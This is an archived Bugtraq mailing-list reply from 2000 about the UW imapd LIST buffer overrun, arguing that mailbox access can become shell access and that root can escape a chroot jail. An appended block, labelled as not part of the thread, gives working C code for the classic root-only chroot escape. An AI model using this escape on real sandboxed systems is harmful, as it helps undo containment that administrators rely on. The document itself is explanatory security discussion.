Bugtraq mailing list archives
Re: response to the bugtraq report of buffer overruns in imapd LIST command
From: mouse () RODENTS MONTREAL QC CA (der Mouse)
Date: Tue, 18 Apr 2000 02:19:56 -0400
> Can we please [] discuss the facts rationally?
> 1) There is no added vulnerability at all for a UNIX system which permits shell access.
This is not quite true. There is no added vulnerability for a system which permits shell access with the same <originating host, password> pair which gives mailbox access. One site I know of, for example, is considering nuking all ways to log in from offsite with a reusable password - but you can still do that for mail, and you can still get a shell with (e.g.) ssh.
> I don't have sufficient data to know what percentage of UW imapd sites run IMAP servers on top of shell UNIX systems as opposed to closed systems.
Then it seems to me that you should assume "most damage", which in this case means that you should assume that a significant number of them *are* such that this is a real problem for them.
> 2) The impact of the problem is that an authorized user may obtain unauthorized shell access to a closed system.
More specifically, mailbox access may be leveraged into shell access. I gave one plausible example above where they are not normally equivalent. A "closed system" (in the sense of one which doesn't normally offer shell access to vanilla users at all) is another. A third might be one where email and shell access both exist, but the password databases for them are different.
> Unless the system also has other, more severe, security problems, the consequences are modest and it is not difficult to identify the perpetrator.
I'll thank you to let *me* determine how severe such a consequence is for my system, thankyouverymuch.
> Last but not least, I am very interested in Kris Kennaway's claim that "It may also be possible to break out of the chroot jail on some platforms." If true, it represents a huge root-level security hole on those platforms. I simply do not believe the claim. I would like to know if there is some substance to this claim, or if it was mere speculation.
Once you're running as root, it borders on trivial to break out of a chroot jail on many (most? all?) platforms. Getting to root in the first place is the interesting part. Depending on the OS and perhaps on what's in the jail, this can be anywhere from trivial to impossible.... If there's a way to break out of a chroot jail *without* first managing to end up running as root, I really want to see it. (On a system that restricts chroot() to root, of course.)

der Mouse

mouse () rodents montreal qc ca
7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
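Added example, not part of der Mouse's post or anything else in this thread: the classic root-only chroot escape that the reply calls "bordering on trivial", written out in C so the mechanism is visible. It assumes a Linux or BSD system where chroot(2) is reserved for root (CAP_SYS_CHROOT on Linux) and a writable /tmp; the function names escape_chroot and chroot_escape_demo are mine. The trick is only that chroot() moves the process root but not its working directory, so a cwd left outside the new root can walk upward with ".." until it reaches the real root.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700   /* chroot() and fchdir() are XSI extensions */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * The classic root-only chroot escape (added example, names are mine):
 *   1. Create a scratch directory inside the jail.
 *   2. chroot() into it WITHOUT chdir()ing into it first.  The kernel
 *      moves the process root, but the cwd is still outside the new
 *      root, which is the whole trick.
 *   3. chdir("..") repeatedly.  Because the cwd is outside the root,
 *      ".." keeps walking upward to the real filesystem root instead of
 *      being clamped at the jail.
 *   4. chroot(".") to make the real root the process root again.
 * Returns 0 on success, -1 with errno set if any step fails (EPERM when
 * the caller lacks root / CAP_SYS_CHROOT).
 */
static int escape_chroot(const char *scratch_dir)
{
    if (mkdir(scratch_dir, 0700) == -1 && errno != EEXIST)
        return -1;
    if (chroot(scratch_dir) == -1)   /* cwd deliberately left where it was */
        return -1;
    for (int i = 0; i < 64; i++)     /* deeper than any realistic jail path */
        if (chdir("..") == -1)
            return -1;
    return chroot(".");
}

/*
 * Runs the escape from an unjailed process, so "success" means we end up
 * with the same root we started with (checked via device/inode of "/").
 * Returns 0 when the behaviour matches the post's claim: the escape works
 * as root and is refused (EPERM) without the privilege; -1 on any other
 * outcome.  Restores the caller's cwd before returning.
 */
static int chroot_escape_demo(void)
{
    char scratch[64];
    struct stat before, after;
    int saved_cwd = open(".", O_RDONLY);
    if (saved_cwd == -1 || stat("/", &before) == -1)
        return -1;
    snprintf(scratch, sizeof scratch, "/tmp/chroot_escape_%ld", (long)getpid());

    int rc = escape_chroot(scratch);
    int saved_errno = errno;
    int result;
    if (rc == 0) {
        /* Back at the original root?  Then the walk-up worked. */
        result = (stat("/", &after) == 0 &&
                  after.st_dev == before.st_dev &&
                  after.st_ino == before.st_ino) ? 0 : -1;
    } else {
        /* Unprivileged callers must be refused; anything else is a bug. */
        result = (saved_errno == EPERM) ? 0 : -1;
    }
    (void)rmdir(scratch);
    (void)fchdir(saved_cwd);
    close(saved_cwd);
    return result;
}

int main(void)
{
    if (chroot_escape_demo() == 0)
        puts(geteuid() == 0 ? "escaped and returned to the original root"
                            : "chroot() refused without root, as expected");
    else
        puts("unexpected result");
    return 0;
}
```

Run it as root outside any jail and it walks up to "/" and reports that it landed on the same root it started from; run it unprivileged and chroot() fails with EPERM, which is the point the reply makes about root being the interesting part. A sandbox that also gives the process its own mount namespace (pivot_root) or uses FreeBSD's jail(2) is not escaped by this walk-up, since there is no parent directory left to reach.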